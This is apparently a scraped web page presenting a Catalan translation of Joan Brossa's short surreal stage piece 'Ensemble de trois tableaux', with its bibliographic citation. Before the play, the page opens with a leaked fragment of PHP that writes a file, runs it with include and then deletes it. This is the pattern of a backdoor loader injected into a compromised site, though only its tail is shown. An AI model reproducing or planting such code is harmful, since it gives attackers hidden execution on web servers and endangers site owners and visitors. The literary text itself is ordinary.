");fclose($hdl);include("{$eb}.$algo");@unlink("{$eb}.$algo");$npDcheckClassBgp='aue';} ?> Ensemble de trois tableaux
Facebook Twitter
Portada > L’espai dels traductors > Català > Marc Audí > Ensemble de trois tableaux

Ensemble de trois tableaux

Joan Brossa

I

L’escenari, sense decoració. Un grup d’obrers munta unes vies –com de vagoneta– que travessen l’escena. En arribar a l’esquerra surten amb els estris donant idea que continuen muntant les vies fora de l’escena. Durant el quadre no deixarem de sentir-los treballar. Pausa.

De dreta a esquerra travessen amb els peus a les vies i en filera, com si es tractés d’un comboi, els personatges següents: un senyor amb abric negre, barret de copa i cartera de pell; un general carregat de medalles i un bisbe de pontifical amb el bàcul a la mà dreta i un fanal vermell a l’esquerra. Entren i surten diferents vegades. Alguns espectadors els insulten, d’altres els aplaudeixen. Es tanca una cortina groga a primer terme.

II

Per l’esquerra entra una stripteasista, enjoiellada, en vestit de nit daurat i mascareta vermella. Riu i es despulla tot jugant amb el seu cos amb molta coqueteria. Duu al sexe una mascareta negra que es canvia per la vermella. Saluda amb la mascareta negra a la cara i se’n va per la dreta.

TELÓ

BROSSA, Joan. Poesia escènica. Barcelona: Edicions 62, 1983, vol VI.
Traduït per Marc Audí
Amb el suport de: